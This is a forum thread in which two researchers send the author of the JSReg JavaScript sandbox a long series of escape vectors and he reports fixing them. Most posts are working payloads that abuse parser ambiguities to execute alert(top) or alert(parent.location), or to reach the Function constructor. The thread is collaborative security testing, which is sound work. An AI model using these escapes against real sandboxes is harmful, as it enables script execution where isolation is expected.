@Jonas

Thanks! These are awesome bugs and fixed :D

I'll disallowed namespaces because JSReg thinks it's a ternary and so allows the property as an array not accessor.

This bug:(function(){this['alert'](this['top'])})()

Was related to your newer post because I wasn't tracking those statements as left == true. The fix was simply to check each of these and simply add left = 1.

As for the typo please suggest an alternative, this work is "owned" :) and built by slackers I'm happy to make it more readable. My logic was it tracks in & instanceof but the result was a pretty bad variable name =)

Once again thanks Jonas, Lever_One and everyone else for breaking JSReg you are making it much stronger!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Regarding the typo, in function rewrite on line 718 it says rewriteinInstanceofOperator instead of rewriteInInstanceofOperator (capital I) which results in error when you for example do:

'x' in {x:1}

I'm finding this too much fun... Spending way too many hours on it.. ;)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

@Jonas

Fixed :)
I know exactly what you mean :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

1.17

+{}
{}/lo='/,alert(parent.location)//'

=========

alert(this) // <-- check this on Opera

Quote
Jonas Magazinius
Opera seems to be broken..

Yeah, but should not.

----------------------
~Veritas~



Edited 2 time(s). Last edit at 05/02/2011 02:17PM by LeverOne.

@LeverOne: Opera seems to be broken..

@Gareth: Here's anotherone for you:

0?0:{}/alert(top)/i

Confusing an object with block and division with regexp. (There are more similar to this one, but I'm in a rush..)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

OK, I couldn't help myself.. Here's one last before my teaching starts:

switch(0){case {}/alert(top)/i:1}


Before this I didn't know that the "case-label" actually is an expression.. Quite interesting!

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Phew fixed all those thanks!

Opera bug wasn't really a opera bug, I had a empty string testing a regex which works on other browsers but not on opera

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

1.18

~
{}/alert(parent.location)/lo

+function(){1}/alert(parent.location)/lo

----------------------
~Veritas~

Tricky and fixed.

Do you think I'm getting closer? or is this just a windmill war?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

NOBODY has been able to do it right the first time. Step by step.

1.19

A

lo:{}/'/,alert(parent.location)//'

lo:function x(){1}/'/,alert(parent.location)//'

B
0
{}/lo='/,alert(parent.location)//'

C
i=0,i++
{}/lo='/,alert(parent.location)//'

D
(function lo(){1})(1,/'/);alert(parent.location)//'

{}'lo'.replace(/'/,""),alert(parent.location)//'


1.20

var È=È/alert(parent.location)/È


============

(function test(x,
JSREG_FUNC){ alert(1)})(1,{})

============

Tip:

I am glad that in version 3.10 you refuse to use constructs such as "!= undefined", "== undefined", etc.

However, in code there are a few:

1) funcName !== undefined

2) Static === undefined

This is potentially very dangerous, because JSREG has a "old environment" mode. At the present time, the consequences are not critical - bypass "checkMaxFunctCalls" or code deformation.

In these cases "undefined" must be replaced by "{}.x" or similar.

----------------------
~Veritas~



Edited 7 time(s). Last edit at 05/04/2011 02:57PM by LeverOne.

@LeverOne

Big thanks! And fixed those
I've also added a list of tests based on previous vectors (I didn't used to have much data but now I do!!! :) )

I've removed the crappy preText check with regexes and instead use states of each match to decide if it's a block statement etc I expect some bugs here because I changed a lot of code :( but I've tested all the previous vectors and it seems to work ok but then again it could create syntax errors, I'll add some js tests too soon which will help eliminate syntax bugs.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

The key moment, which determines the difference between the block's delim and the object's literal, can be "moved up" as far as possible.

var lo=0?
lo:{}/alert(parent.location)/0


~{
lo1:{lo2:1}/alert(parent.location)/1
}


{lo1:
{lo2:1}/'/,alert(parent.location)//'
}


(
{lo:1}/alert(parent.location)/1
)


[
{lo:1}/alert(parent.location)/1
]



Nevertheless, a little better!

===============================

Quote

(chr === '+' || chr === '-' || chr === '+')

----------------------
~Veritas~



Edited 5 time(s). Last edit at 05/06/2011 06:48AM by LeverOne.

Cool fixed those and added the vectors to the hack test

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Quote

{lo1:
{lo2:1}/'/,alert(parent.location)//'
}

Quote

[
{lo:1}/alert(parent.location)/1
]

1?
{}/alert(parent.location)/i:0

0?0?
lo:lo:{}/alert(parent.location)/1

0
{
/'lo/,alert(parent.location)//'
}


Bugs:

~/lo/

a\u006Cert(1) vs a\u006cert(1)

alert((0||alert)instanceof.2.constructor)

Quote
Gareth Heyes
I need to think about that one

I agree, this remains a rather large hole. I stop checking for a while.

----------------------
~Veritas~



Edited 2 time(s). Last edit at 05/09/2011 10:55AM by LeverOne.

Thanks! Fixed those.

I'm not happy with out I detect block statements though, I need to think about that one I expect it will be pwnd again :(

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Pwnd myself sigh

(function(){
if(0)
return
{}/'abc/;var x=alert(location);//'
})()

Update...
and fixed. I'm gonna rewrite some code and make it a little more defensive

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 05/10/2011 07:15AM by Gareth Heyes.

Found two new bypasses based on the in operator:

0 in /'/,alert(top)//

for(0 in /'/,alert(top)/i);

I think the problem might be left=1; but I don't know the source well enough.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Yeah I made left = 1 for in operators which is wrong =) and I didn't add the laststate check for in operators in the regex check. Fixed and big thanks again!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

There are a number of issues with the parsing and rewriting of for-in loops.

First, the "forin" regex does not properly parse for-in loops:

for(x in [])[] // Incorrect parse
for(x in ([]))[] // Correct parse
for(x in void 0)[] // Incorrect parse
for(x in (void 0))[] // Correct parse
for([] in x)[] // Incorrect parse
for(([]) in x)[] // Incorrect parse
for({} in x)[] // Incorrect parse
for(x in x)[] // Correct parse



Second, the rewriting of for-in loops without a block, breaks the loop structure:

for(x in x)[] // rewrites to:

for($x$ in $x$)
if(!/^[$].+[$]$/.test($x$)){continue;};
$x$=$x$.replace(/^\$|\$$/g,'');
[]


Thirdly, the regex to check that property names begin and end with $ does not take numbers into account:

for(x in ([1,2])){alert(x)} // Should alert 0 and 1 but doesn't

Suggested fix:
if(!/^[$].+[$]$|^\d+$/.test($x$)){continue;};


Lastly, some bypasses based on the first problem:

for(x in void 0)/'/;alert(top)//
for(x in [].x)/'/;alert(top)//
for(x in [][0])/'/;alert(top)//
for([] in ([].x))/'/;alert(top)//
if(0 in[])/'/;alert(top)//
if([]in[])/'/;alert(top)//
while([]in[])/'/;alert(top)//
for(;[]in[];)/'/;alert(top)//



One interesting side-note; if the right-hand side of the for-in is undefined, the left hand side is never evaluated.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 05/15/2011 04:24PM by Jonas Magazinius.

BTW, if you want to make it defensive; one thing I look for when testing is situations where [] is incorrectly parsed as index instead of array and rewritten to [JSREG_FUNC.gp()]

This should never happen since the index should always have an expression in it, i.e. [][] gives syntax error.

When I find this I know that / will be incorrectly parsed as division instead of regex.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Jonas you're awesome! I knew this would be the next thing you'd exploit =) I will rewrite the loops section as it's pretty weak as you've demonstrated. I'll also improve each match to use one check instead of two for performance. Pretty busy atm but expect an update soon probably when the missus is watching something crap on tv :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Turns out the problem runs a bit deeper than I thought:

while(0)/'/;alert(top)//
if(0)/'/;alert(top)//
for(;0;)/'/;alert(top)//
with(0)/'/;alert(top)//

Not sure if these are a separate issue or not.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

A new kind of problem:

0/function(){}/alert(top)//

Also, this causes endless loop:

0/function(){}/

Found while trying to exploit this:

function()[]

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

1
~/'lo/+alert(parent.location)//'


true
{}/'lo/+alert(parent.location)//'


1?
function lo(){1}/alert(parent.location)/1:1


var i=1
i+++
{lo:1}/alert(parent.location)/1


added later:

[
function(lo){}/alert(parent.location)/1
]


Bugs:

~function(){/re/}

~{x:/re/}

(0||alert)instanceof.2.constructor --> should return "false" (missed Number.prototype.$constructor$ and Math.prototype.$constructor$)

----------------------
~Veritas~



Edited 1 time(s). Last edit at 05/18/2011 08:55AM by LeverOne.

Sorry, but here's another one..

(function(){}['constructor'])('alert(top)')()

(function(){}/alert(top)/1)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 05/17/2011 02:37PM by Jonas Magazinius.

@Jonas Magazinius,

previous one was a great bypass!

--------- Non-IE browsers

1</**/!--i+
{}/'lo/,alert(parent.location)//'


1<//
!--i+
{}/'lo/,alert(parent.location)//'

----------------------
~Veritas~



Edited 2 time(s). Last edit at 05/18/2011 08:49AM by LeverOne.

@LeverOne: Thanks, I admire your work :)

And two more..

[]instanceof{}/alert(top)//
[]in{}/alert(top)//

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Non-FF browsers:

var n
/'lo/+alert(parent.location)//'


===================

Additional testcases for statements "break" and "continue":

All browsers:

for (i=0;i<1;i++){
if(0) continue
{}/'lo/+alert(parent.location)//'
}


for (i=0;i<1;i++){
if(0) break
{}/'lo/+alert(parent.location)//'
}


Non-FF browsers:

x:for (i=0;i<1;i++){
if(0) continue x
/'lo/+alert(parent.location)//'
}


x:for (i=0;i<1;i++){
if(0) break x
/'lo/+alert(parent.location)//'
}

=================================

if(0)0
else {}/'lo/,alert(parent.location)//'


try{}
catch(e){}
finally{}/'lo/,alert(parent.location)//'


bug:

if(0)0
else/x/


Another syntactic heterogeneity: ";" followed by a declarations block - isn't nessesary.

for(;
{}/alert(parent.location)/1
;lo)0

==============================

I would also like to warn you, @Gareth, about syntactic bomb based on this:

Quote
Jonas Magazinius
if(0)/'/;alert(top)//

Actually here is bomb:

// FF

try{x}
catch(lo if(1)/alert(parent.location)/1){}

----------------------
~Veritas~



Edited 7 time(s). Last edit at 06/26/2011 01:48PM by LeverOne.

@LeverOne @Jonas

I too admire both your work :)

I seem to have a bloody nose again :D great stuff! Thanks, I'll let you know soon when I have a fix. Statements defo needs a rewrite.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

I don't know how to thank you guys as you've helped me so much so I've dedicated a blog post to you both and uploaded a new version of JSReg

[www.thespanner.co.uk]

If I was a millionaire I'd give you cold hard cash :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 07/14/2011 06:32PM by Gareth Heyes.